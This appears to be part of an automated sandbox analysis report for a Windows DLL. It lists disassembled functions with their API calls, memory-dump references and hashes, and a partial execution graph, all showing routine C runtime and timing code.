                                                                                                                            Function 6D761545 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9C40E07D,00000000,?,00000000,6D769992,000000FF,?,6D7614DF,?,?,6D7614B3,?), ref: 6D76157A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D76158C
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,6D769992,000000FF,?,6D7614DF,?,?,6D7614B3,?), ref: 6D7615AE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: 6044c22efcb60e22baaec627557e7e1cfe4d61856d1be4b56a9b5fb2c8f9b0e9
                                                                                                                            • Instruction ID: be8744c0f012d517f2a6b3187c0a7e494eca2a8cb58911c4d1b22d0998bf6fab
                                                                                                                            • Opcode Fuzzy Hash: 6044c22efcb60e22baaec627557e7e1cfe4d61856d1be4b56a9b5fb2c8f9b0e9
                                                                                                                            • Instruction Fuzzy Hash: 740144719146A6AFDB019B50CD09FBEF7B9FB05624F004535FC22A2690FB75A900CA62
                                                                                                                            Function 6D765DC4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 6D765E49
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 6D765F12
                                                                                                                            • __freea.LIBCMT ref: 6D765F79
                                                                                                                              • Part of subcall function 6D7627B2: HeapAlloc.KERNEL32(00000000,6D7637BC,?,?,6D7637BC,00000220,?,00000000,?), ref: 6D7627E4
                                                                                                                            • __freea.LIBCMT ref: 6D765F8C
                                                                                                                            • __freea.LIBCMT ref: 6D765F99
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1096550386-0
                                                                                                                            • Opcode ID: cbf410f1815014cdf5d476429790a44b4a345673023b0ebfcb992d683384b7ef
                                                                                                                            • Instruction ID: 4ec4626f40f71bf69c0a63b80bf9c6a327e5b9b9880bb065e0c7425a60f5426a
                                                                                                                            • Opcode Fuzzy Hash: cbf410f1815014cdf5d476429790a44b4a345673023b0ebfcb992d683384b7ef
                                                                                                                            • Instruction Fuzzy Hash: 0C51B1725042876FEB114E64EE84EFB3BA9EF44634B16052AFE1496541FB30CC10A6B2
                                                                                                                            Function 6D75FC72 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D75FC23,00000000,?,00000001,?,?,?,6D75FD12,00000001,FlsFree,6D76B5C8,FlsFree), ref: 6D75FC7F
                                                                                                                            • GetLastError.KERNEL32(?,6D75FC23,00000000,?,00000001,?,?,?,6D75FD12,00000001,FlsFree,6D76B5C8,FlsFree,00000000,?,6D75F771), ref: 6D75FC89
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D75FCB1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                            • Opcode ID: 9e9cf747668e6bf3edc210da7d303b36160180823de9311f6748bc57c90cb2c1
                                                                                                                            • Instruction ID: 2a52b86236205bba8e522d25dfec974f19503b93d3ef2a0f6a33e9b624353e3e
                                                                                                                            • Opcode Fuzzy Hash: 9e9cf747668e6bf3edc210da7d303b36160180823de9311f6748bc57c90cb2c1
                                                                                                                            • Instruction Fuzzy Hash: F1E04F35248345BBEF101FB0DE0AF687A75AB01B64F904032FE0DA84D1FB72A9208997
                                                                                                                            Function 6D7664D1 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetConsoleOutputCP.KERNEL32(9C40E07D,00000000,00000000,?), ref: 6D766534
                                                                                                                              • Part of subcall function 6D763E11: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D765F6F,?,00000000,-00000008), ref: 6D763E72
                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6D766786
                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D7667CC
                                                                                                                            • GetLastError.KERNEL32 ref: 6D76686F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2112829910-0
                                                                                                                            • Opcode ID: b0f022f1f792678f2a45423d806aab502f8459568ebec8474142221a65c86d0c
                                                                                                                            • Instruction ID: 23e088b2e471e76d93712fae2069269249b78707ff6fb818261b018b549270a4
                                                                                                                            • Opcode Fuzzy Hash: b0f022f1f792678f2a45423d806aab502f8459568ebec8474142221a65c86d0c
                                                                                                                            • Instruction Fuzzy Hash: 79D1AFB1D042999FCF05CFE8C980AADBBB5FF09324F54416AE955E7341E730AA41CBA1
                                                                                                                            Function 6D75FDF3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustPointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1740715915-0
                                                                                                                            • Opcode ID: 335e80c2bf60e7799ccf0b8c8cce166cd5b6edd2147a56a3167dca4826484fd6
                                                                                                                            • Instruction ID: 0d5b5153d3f6dc0651a4f29c2eebaff5ab3dee035eeec299e4cdfad37b15d540
                                                                                                                            • Opcode Fuzzy Hash: 335e80c2bf60e7799ccf0b8c8cce166cd5b6edd2147a56a3167dca4826484fd6
                                                                                                                            • Instruction Fuzzy Hash: 5151DD76605603AFEB158F10DA40BBAF3A5FF05324F10412EEE1547691EB31E961C793
                                                                                                                            Function 6D762A5D Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6D763E11: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D765F6F,?,00000000,-00000008), ref: 6D763E72
                                                                                                                            • GetLastError.KERNEL32 ref: 6D762AC1
                                                                                                                            • __dosmaperr.LIBCMT ref: 6D762AC8
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 6D762B02
                                                                                                                            • __dosmaperr.LIBCMT ref: 6D762B09
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1913693674-0
                                                                                                                            • Opcode ID: bed6a0f3acc36b545ed9923ce68d02371b9a3ac12f106ae0dcccff8ae2c8e4bb
                                                                                                                            • Instruction ID: a9f45e599f5fa517f67f6e3968c2ccefdb1845f48ab254a68eb8c26fd59b7595
                                                                                                                            • Opcode Fuzzy Hash: bed6a0f3acc36b545ed9923ce68d02371b9a3ac12f106ae0dcccff8ae2c8e4bb
                                                                                                                            • Instruction Fuzzy Hash: 8D21B231708296AF97629F65CA8896AB7AAFF413787058429ED1897540F770EC00C7B2
                                                                                                                            Function 6D763EB4 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 6D763EBC
                                                                                                                              • Part of subcall function 6D763E11: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D765F6F,?,00000000,-00000008), ref: 6D763E72
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D763EF4
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D763F14
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 158306478-0
                                                                                                                            • Opcode ID: 2cf666856753d64723be1eff05aaa3f460a7596e7dd5a5a671dcb1956c23cdcd
                                                                                                                            • Instruction ID: e6d31571079a02c0d942857270f133d541809abaee776378a1e0cb54089271e6
                                                                                                                            • Opcode Fuzzy Hash: 2cf666856753d64723be1eff05aaa3f460a7596e7dd5a5a671dcb1956c23cdcd
                                                                                                                            • Instruction Fuzzy Hash: 771161B15096A67FAB161AB54E8CCAF7ABCDE962B87190039FE0591100FF64DD00C6B3
                                                                                                                            Function 6D767BD6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6D767395,00000000,00000001,00000000,?,?,6D7668C3,?,00000000,00000000), ref: 6D767BED
                                                                                                                            • GetLastError.KERNEL32(?,6D767395,00000000,00000001,00000000,?,?,6D7668C3,?,00000000,00000000,?,?,?,6D766E66,00000000), ref: 6D767BF9
                                                                                                                              • Part of subcall function 6D767BBF: CloseHandle.KERNEL32(FFFFFFFE,6D767C09,?,6D767395,00000000,00000001,00000000,?,?,6D7668C3,?,00000000,00000000,?,?), ref: 6D767BCF
                                                                                                                            • ___initconout.LIBCMT ref: 6D767C09
                                                                                                                              • Part of subcall function 6D767B81: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D767BB0,6D767382,?,?,6D7668C3,?,00000000,00000000,?), ref: 6D767B94
                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6D767395,00000000,00000001,00000000,?,?,6D7668C3,?,00000000,00000000,?), ref: 6D767C1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2744216297-0
                                                                                                                            • Opcode ID: 70136b0653eb265602e23d54a9d54d5cab775b9f816e6564ed2b2f49582b5e81
                                                                                                                            • Instruction ID: c70299c80fa211e8be139a14b55f9f0a5753f6c14b2b0925a1a8985772299c03
                                                                                                                            • Opcode Fuzzy Hash: 70136b0653eb265602e23d54a9d54d5cab775b9f816e6564ed2b2f49582b5e81
                                                                                                                            • Instruction Fuzzy Hash: CFF0F8368051A9BBCF121E918D08E997E76EB097B0B054421FE2895520E73289609BA2
                                                                                                                            Function 6D766D84 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6D7664D1: GetConsoleOutputCP.KERNEL32(9C40E07D,00000000,00000000,?), ref: 6D766534
                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6D764C64,?), ref: 6D766F09
                                                                                                                            • GetLastError.KERNEL32(?,6D764C64,?,6D764AF7,00000000,?,00000000,6D764AF7,?,00000000,00000000,6D770268,0000002C,6D764B68,?), ref: 6D766F13
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                            • String ID: dLvm
                                                                                                                            • API String ID: 2915228174-2800093305
                                                                                                                            • Opcode ID: 301b146263ff4cd4c3b69899d1a446f2517a8e8782a26c8ff049f98a9b1582f4
                                                                                                                            • Instruction ID: 52dae31cd675f86c31a81eacd743adadb00972f4b2db78d771c2e3123be6b932
                                                                                                                            • Opcode Fuzzy Hash: 301b146263ff4cd4c3b69899d1a446f2517a8e8782a26c8ff049f98a9b1582f4
                                                                                                                            • Instruction Fuzzy Hash: AD61B6B180419AAFDF01CFA8CA44AEE7BB9BB05324F454199ED10A7205E331DA15CBE2
                                                                                                                            Function 6D75F0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6D75F12F
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6D75F1E3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 3480331319-1018135373
                                                                                                                            • Opcode ID: 19daa91a1c6b5365380b70b358afd92db74a0ec3bc53a4756479c3d19c94a53e
                                                                                                                            • Instruction ID: da1874a27492cfe1e4c5aa7fe9ff2bfdaf03e110b034871025637e473d760679
                                                                                                                            • Opcode Fuzzy Hash: 19daa91a1c6b5365380b70b358afd92db74a0ec3bc53a4756479c3d19c94a53e
                                                                                                                            • Instruction Fuzzy Hash: C041A434904259ABCF00DF68CA84BAEFBB5EF45338F108166E9149B351DB319A25CB93
                                                                                                                            Function 6D7603EF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 6D760414
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                            • Opcode ID: 03bcdf641d050e479b3730b4c83a1030f96aafcba16fb7f4fc714cf0bef6d19b
                                                                                                                            • Instruction ID: e91d61fd4e5288f6dbf6405d51d760c5cae8afb221c356e26d6aa069694b22af
                                                                                                                            • Opcode Fuzzy Hash: 03bcdf641d050e479b3730b4c83a1030f96aafcba16fb7f4fc714cf0bef6d19b
                                                                                                                            • Instruction Fuzzy Hash: 73417C71900249AFCF02CF94CA81EAEBBB5FF48324F1580A9FE0567251E7359950DB62

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:4.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:3.4%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:30
                                                                                                                            execution_graph 72461 6cc5b694 72462 6cc5b6a0 ___scrt_is_nonwritable_in_current_image 72461->72462 72491 6cc5af2a 72462->72491 72464 6cc5b6a7 72465 6cc5b796 72464->72465 72466 6cc5b6d1 72464->72466 72469 6cc5b6ac ___scrt_is_nonwritable_in_current_image 72464->72469 72508 6cc5b1f7 IsProcessorFeaturePresent 72465->72508 72495 6cc5b064 72466->72495 72470 6cc5b6e0 __RTC_Initialize 72470->72469 72498 6cc5bf89 InitializeSListHead 72470->72498 72472 6cc5b79d ___scrt_is_nonwritable_in_current_image 72474 6cc5b7d2 72472->72474 72475 6cc5b828 72472->72475 72489 6cc5b7b3 ___scrt_uninitialize_crt __RTC_Initialize 72472->72489 72473 6cc5b6ee ___scrt_initialize_default_local_stdio_options 72476 6cc5b6f3 _initterm_e 72473->72476 72512 6cc5b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 72474->72512 72477 6cc5b1f7 ___scrt_fastfail 6 API calls 72475->72477 72476->72469 72479 6cc5b708 72476->72479 72480 6cc5b82f 72477->72480 72499 6cc5b072 72479->72499 72486 6cc5b86e dllmain_crt_process_detach 72480->72486 72487 6cc5b83b 72480->72487 72481 6cc5b7d7 72513 6cc5bf95 __std_type_info_destroy_list 72481->72513 72483 6cc5b70d 72483->72469 72485 6cc5b711 _initterm 72483->72485 72485->72469 72490 6cc5b840 72486->72490 72488 6cc5b860 dllmain_crt_process_attach 72487->72488 72487->72490 72488->72490 72492 6cc5af33 72491->72492 72514 6cc5b341 IsProcessorFeaturePresent 72492->72514 72494 6cc5af3f ___scrt_uninitialize_crt 72494->72464 72515 6cc5af8b 72495->72515 72497 6cc5b06b 72497->72470 72498->72473 72500 6cc5b077 ___scrt_release_startup_lock 72499->72500 72501 6cc5b082 72500->72501 72502 6cc5b07b 72500->72502 72505 6cc5b087 _configure_narrow_argv 72501->72505 72525 6cc5b341 IsProcessorFeaturePresent 72502->72525 72504 6cc5b080 72504->72483 72506 6cc5b095 _initialize_narrow_environment 72505->72506 72507 6cc5b092 72505->72507 72506->72504 72507->72483 72509 6cc5b20c ___scrt_fastfail 72508->72509 72510 6cc5b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 72509->72510 72511 6cc5b302 ___scrt_fastfail 72510->72511 72511->72472 72512->72481 72513->72489 72514->72494 72516 6cc5af9e 72515->72516 72517 6cc5af9a 72515->72517 72518 6cc5b028 72516->72518 72519 6cc5afab ___scrt_release_startup_lock 72516->72519 72517->72497 72520 6cc5b1f7 ___scrt_fastfail 6 API calls 72518->72520 72522 6cc5afb8 _initialize_onexit_table 72519->72522 72524 6cc5afd6 72519->72524 72521 6cc5b02f 72520->72521 72523 6cc5afc7 _initialize_onexit_table 72522->72523 72522->72524 72523->72524 72524->72497 72525->72504 72526 6cc23060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 72531 6cc5ab2a 72526->72531 72530 6cc230db 72535 6cc5ae0c _crt_atexit _register_onexit_function 72531->72535 72533 6cc230cd 72534 6cc5b320 5 API calls ___raise_securityfailure 72533->72534 72534->72530 72535->72533 72536 6cc235a0 72537 6cc235c4 InitializeCriticalSectionAndSpinCount getenv 72536->72537 72552 6cc23846 __aulldiv 72536->72552 72539 6cc238fc strcmp 72537->72539 72551 6cc235f3 __aulldiv 72537->72551 72541 6cc23912 strcmp 72539->72541 72539->72551 72540 6cc238f4 72541->72551 72542 6cc235f8 QueryPerformanceFrequency 72542->72551 72543 6cc23622 _strnicmp 72545 6cc23944 _strnicmp 72543->72545 72543->72551 72544 6cc2376a QueryPerformanceCounter EnterCriticalSection 72546 6cc237b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 72544->72546 72550 6cc2375c 72544->72550 72547 6cc2395d 72545->72547 72545->72551 72549 6cc237fc LeaveCriticalSection 72546->72549 72546->72550 72548 6cc23664 GetSystemTimeAdjustment 72548->72551 72549->72550 72549->72552 72550->72544 72550->72546 72550->72549 72550->72552 72551->72542 72551->72543 72551->72545 72551->72547 72551->72548 72551->72550 72553 6cc5b320 5 API calls ___raise_securityfailure 72552->72553 72553->72540 72554 6cc3c930 GetSystemInfo VirtualAlloc 72555 6cc3c9a3 GetSystemInfo 72554->72555 72559 6cc3c973 72554->72559 72557 6cc3c9d0 72555->72557 72558 6cc3c9b6 72555->72558 72557->72559 72560 6cc3c9d8 VirtualAlloc 72557->72560 72558->72557 72562 6cc3c9bd 72558->72562 72570 6cc5b320 5 API calls ___raise_securityfailure 72559->72570 72563 6cc3c9f0 72560->72563 72564 6cc3c9ec 72560->72564 72561 6cc3c99b 72562->72559 72565 6cc3c9c1 VirtualFree 72562->72565 72571 6cc5cbe8 GetCurrentProcess TerminateProcess 72563->72571 72564->72559 72565->72559 72570->72561 72572 6cc5b830 72573 6cc5b86e dllmain_crt_process_detach 72572->72573 72574 6cc5b83b 72572->72574 72576 6cc5b840 72573->72576 72575 6cc5b860 dllmain_crt_process_attach 72574->72575 72574->72576 72575->72576 72577 6cc5b9c0 72578 